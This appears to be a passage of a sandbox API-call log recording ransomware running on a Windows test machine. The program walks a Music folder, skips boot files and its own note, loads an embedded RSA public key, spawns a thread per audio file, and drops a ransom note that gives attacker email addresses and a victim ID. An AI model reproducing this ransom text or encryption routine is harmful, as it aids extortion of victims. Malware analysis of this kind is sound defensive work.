lstrcpyA (in: lpString1=0x17c91c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0050.369] lstrcpyW (in: lpString1=0x17cf1c, lpString2="yV_ r.m4a" | out: lpString1="yV_ r.m4a") returned="yV_ r.m4a" [0050.369] lstrcpyW (in: lpString1=0x17cb1c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\" [0050.369] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17c91c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x5c4 [0050.370] Sleep (dwMilliseconds=0x96) [0050.524] FindNextFileW (in: hFindFile=0x324878, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0050.524] lstrcmpW (lpString1="Z9ycP6znphCfb.m4a", lpString2="..") returned 1 [0050.524] lstrcmpW (lpString1="Z9ycP6znphCfb.m4a", lpString2=".") returned 1 [0050.524] StrStrW (lpFirst="Z9ycP6znphCfb.m4a", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0050.524] StrStrW (lpFirst="Z9ycP6znphCfb.m4a", lpSrch="ntldr") returned 0x0 [0050.524] StrStrW (lpFirst="Z9ycP6znphCfb.m4a", lpSrch="NTLDR") returned 0x0 [0050.524] StrStrW (lpFirst="Z9ycP6znphCfb.m4a", lpSrch="NTDETECT.COM") returned 0x0 [0050.524] StrStrW (lpFirst="Z9ycP6znphCfb.m4a", lpSrch="ntdetect.com") returned 0x0 [0050.524] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\", lpSrch="Desktop") returned 0x0 [0050.525] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\", lpSrch="DESKTOP") returned 0x0 [0050.525] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\") returned 40 [0050.525] lstrcpyA (in: lpString1=0x17c91c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0050.525] lstrcpyW (in: lpString1=0x17cf1c, lpString2="Z9ycP6znphCfb.m4a" | out: lpString1="Z9ycP6znphCfb.m4a") returned="Z9ycP6znphCfb.m4a" [0050.525] lstrcpyW (in: lpString1=0x17cb1c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\" [0050.525] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17c91c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x5ec [0050.525] Sleep (dwMilliseconds=0x96) [0050.680] FindNextFileW (in: hFindFile=0x324878, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0050.680] lstrcmpW (lpString1="_HELP_INSTRUCTION.TXT", lpString2="..") returned 1 [0050.680] lstrcmpW (lpString1="_HELP_INSTRUCTION.TXT", lpString2=".") returned 1 [0050.680] StrStrW (lpFirst="_HELP_INSTRUCTION.TXT", lpSrch="_HELP_INSTRUCTION.TXT") returned="_HELP_INSTRUCTION.TXT" [0050.680] FindNextFileW (in: hFindFile=0x324878, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0 [0050.680] FindClose (in: hFindFile=0x324878 | out: hFindFile=0x324878) returned 1 [0050.680] FindClose (in: hFindFile=0x324878 | out: hFindFile=0x324878) returned 0 [0050.681] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music" [0050.681] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music", lpString2="\\*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\*.*" [0050.681] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\", lpSrch="Desktop") returned 0x0 [0050.681] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\", lpSrch="DESKTOP") returned 0x0 [0050.681] SetErrorMode (uMode=0x1) returned 0x1 [0050.681] wsprintfW (in: param_1=0x17c4dc, param_2="%s\\_HELP_INSTRUCTION.TXT" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\_HELP_INSTRUCTION.TXT") returned 57 [0050.681] GetUserNameW (in: lpBuffer=0x17a2b8, pcbBuffer=0x17a0a4 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x17a0a4) returned 1 [0050.681] wsprintfW (in: param_1=0x17a0b0, param_2="FF%08X" | out: param_1="FFE1010314") returned 10 [0050.681] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x17a0ac | out: phkResult=0x17a0ac*=0x5e4) returned 0x0 [0050.681] RegQueryValueExW (in: hKey=0x5e4, lpValueName="FFE1010314", lpReserved=0x0, lpType=0x0, lpData=0x3de4788, lpcbData=0x17a0a8*=0x104 | out: lpType=0x0, lpData=0x3de4788*=0x65, lpcbData=0x17a0a8*=0x4a) returned 0x0 [0050.681] RegCloseKey (hKey=0x5e4) returned 0x0 [0050.681] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55829720, cbMultiByte=-1, lpWideCharStr=0x17b4dc, cchWideChar=2048 | out: lpWideCharStr="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n") returned 321 [0050.681] wsprintfW (in: param_1=0x17a4dc, param_2="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n" | out: param_1="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-eb9e4beb-6738-47db-bcc2-4b2202afb33f number\r\n\r\n") returned 354 [0050.681] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\_help_instruction.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5e4 [0050.682] CloseHandle (hObject=0x5e4) returned 1 [0050.682] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\*.*", lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0x324878 [0050.682] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music") returned="Music" [0050.682] lstrcpyW (in: lpString1=0x17c6e4, lpString2="Music" | out: lpString1="Music") returned="Music" [0050.682] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0050.682] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0050.682] FindNextFileW (in: hFindFile=0x324878, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0050.682] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0050.682] FindNextFileW (in: hFindFile=0x324878, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0050.682] FindNextFileW (in: hFindFile=0x324878, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0050.682] FindNextFileW (in: hFindFile=0x324878, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0050.682] FindNextFileW (in: hFindFile=0x324878, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0050.682] lstrcmpW (lpString1="auOsV3M 9VtNbJuKze", lpString2="..") returned 1 [0050.682] lstrcmpW (lpString1="auOsV3M 9VtNbJuKze", lpString2=".") returned 1 [0050.682] lstrcpyW (in: lpString1=0x17d570, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music" [0050.682] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\" [0050.682] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\", lpString2="auOsV3M 9VtNbJuKze" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze" [0050.682] SetErrorMode (uMode=0x1) returned 0x1 [0050.682] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze" [0050.682] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\" [0050.682] lstrcpyW (in: lpString1=0x5582a700, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\" [0050.682] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\", lpString2="*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\*.*" [0050.682] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\*.*", lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 0x3e28638 [0050.683] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze") returned="auOsV3M 9VtNbJuKze" [0050.683] lstrcpyW (in: lpString1=0x17b644, lpString2="auOsV3M 9VtNbJuKze" | out: lpString1="auOsV3M 9VtNbJuKze") returned="auOsV3M 9VtNbJuKze" [0050.683] FindNextFileW (in: hFindFile=0x3e28638, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0050.683] FindNextFileW (in: hFindFile=0x3e28638, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0050.683] lstrcmpW (lpString1="2--S BWBtG7 nG.mp3", lpString2="..") returned 1 [0050.683] lstrcmpW (lpString1="2--S BWBtG7 nG.mp3", lpString2=".") returned 1 [0050.683] StrStrW (lpFirst="2--S BWBtG7 nG.mp3", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0050.683] StrStrW (lpFirst="2--S BWBtG7 nG.mp3", lpSrch="ntldr") returned 0x0 [0050.683] StrStrW (lpFirst="2--S BWBtG7 nG.mp3", lpSrch="NTLDR") returned 0x0 [0050.683] StrStrW (lpFirst="2--S BWBtG7 nG.mp3", lpSrch="NTDETECT.COM") returned 0x0 [0050.683] StrStrW (lpFirst="2--S BWBtG7 nG.mp3", lpSrch="ntdetect.com") returned 0x0 [0050.683] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\", lpSrch="Desktop") returned 0x0 [0050.683] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\", lpSrch="DESKTOP") returned 0x0 [0050.683] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\") returned 59 [0050.683] lstrcpyA (in: lpString1=0x17b87c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0050.683] lstrcpyW (in: lpString1=0x17be7c, lpString2="2--S BWBtG7 nG.mp3" | out: lpString1="2--S BWBtG7 nG.mp3") returned="2--S BWBtG7 nG.mp3" [0050.683] lstrcpyW (in: lpString1=0x17ba7c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\" [0050.683] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17b87c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x60c [0050.684] Sleep (dwMilliseconds=0x96) [0050.836] FindNextFileW (in: hFindFile=0x3e28638, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0050.836] lstrcmpW (lpString1="6Fs5O-wZK5i.m4a", lpString2="..") returned 1 [0050.836] lstrcmpW (lpString1="6Fs5O-wZK5i.m4a", lpString2=".") returned 1 [0050.836] StrStrW (lpFirst="6Fs5O-wZK5i.m4a", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0050.836] StrStrW (lpFirst="6Fs5O-wZK5i.m4a", lpSrch="ntldr") returned 0x0 [0050.837] StrStrW (lpFirst="6Fs5O-wZK5i.m4a", lpSrch="NTLDR") returned 0x0 [0050.837] StrStrW (lpFirst="6Fs5O-wZK5i.m4a", lpSrch="NTDETECT.COM") returned 0x0 [0050.837] StrStrW (lpFirst="6Fs5O-wZK5i.m4a", lpSrch="ntdetect.com") returned 0x0 [0050.837] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\", lpSrch="Desktop") returned 0x0 [0050.837] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\", lpSrch="DESKTOP") returned 0x0 [0050.837] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\") returned 59 [0050.837] lstrcpyA (in: lpString1=0x17b87c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0050.837] lstrcpyW (in: lpString1=0x17be7c, lpString2="6Fs5O-wZK5i.m4a" | out: lpString1="6Fs5O-wZK5i.m4a") returned="6Fs5O-wZK5i.m4a" [0050.837] lstrcpyW (in: lpString1=0x17ba7c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\" [0050.837] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17b87c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x5b8 [0050.837] WaitForSingleObject (hHandle=0x5b8, dwMilliseconds=0xffffffff) returned 0x0 [0051.857] Sleep (dwMilliseconds=0x96) [0052.006] FindNextFileW (in: hFindFile=0x3e28638, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0052.006] lstrcmpW (lpString1="9tkObc3F16FjSYiAwFD.wav", lpString2="..") returned 1 [0052.006] lstrcmpW (lpString1="9tkObc3F16FjSYiAwFD.wav", lpString2=".") returned 1 [0052.006] StrStrW (lpFirst="9tkObc3F16FjSYiAwFD.wav", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0052.006] StrStrW (lpFirst="9tkObc3F16FjSYiAwFD.wav", lpSrch="ntldr") returned 0x0 [0052.006] StrStrW (lpFirst="9tkObc3F16FjSYiAwFD.wav", lpSrch="NTLDR") returned 0x0 [0052.006] StrStrW (lpFirst="9tkObc3F16FjSYiAwFD.wav", lpSrch="NTDETECT.COM") returned 0x0 [0052.006] StrStrW (lpFirst="9tkObc3F16FjSYiAwFD.wav", lpSrch="ntdetect.com") returned 0x0 [0052.006] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\", lpSrch="Desktop") returned 0x0 [0052.006] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\", lpSrch="DESKTOP") returned 0x0 [0052.006] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\") returned 59 [0052.006] lstrcpyA (in: lpString1=0x17b87c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0052.007] lstrcpyW (in: lpString1=0x17be7c, lpString2="9tkObc3F16FjSYiAwFD.wav" | out: lpString1="9tkObc3F16FjSYiAwFD.wav") returned="9tkObc3F16FjSYiAwFD.wav" [0052.007] lstrcpyW (in: lpString1=0x17ba7c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\" [0052.007] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17b87c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x628 [0052.007] Sleep (dwMilliseconds=0x96) [0052.162] FindNextFileW (in: hFindFile=0x3e28638, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0052.162] FindNextFileW (in: hFindFile=0x3e28638, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0052.162] lstrcmpW (lpString1="aF_IB.m4a", lpString2="..") returned 1 [0052.162] lstrcmpW (lpString1="aF_IB.m4a", lpString2=".") returned 1 [0052.162] StrStrW (lpFirst="aF_IB.m4a", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0052.162] StrStrW (lpFirst="aF_IB.m4a", lpSrch="ntldr") returned 0x0 [0052.162] StrStrW (lpFirst="aF_IB.m4a", lpSrch="NTLDR") returned 0x0 [0052.162] StrStrW (lpFirst="aF_IB.m4a", lpSrch="NTDETECT.COM") returned 0x0 [0052.162] StrStrW (lpFirst="aF_IB.m4a", lpSrch="ntdetect.com") returned 0x0 [0052.162] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\", lpSrch="Desktop") returned 0x0 [0052.162] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\", lpSrch="DESKTOP") returned 0x0 [0052.163] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\") returned 59 [0052.163] lstrcpyA (in: lpString1=0x17b87c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC 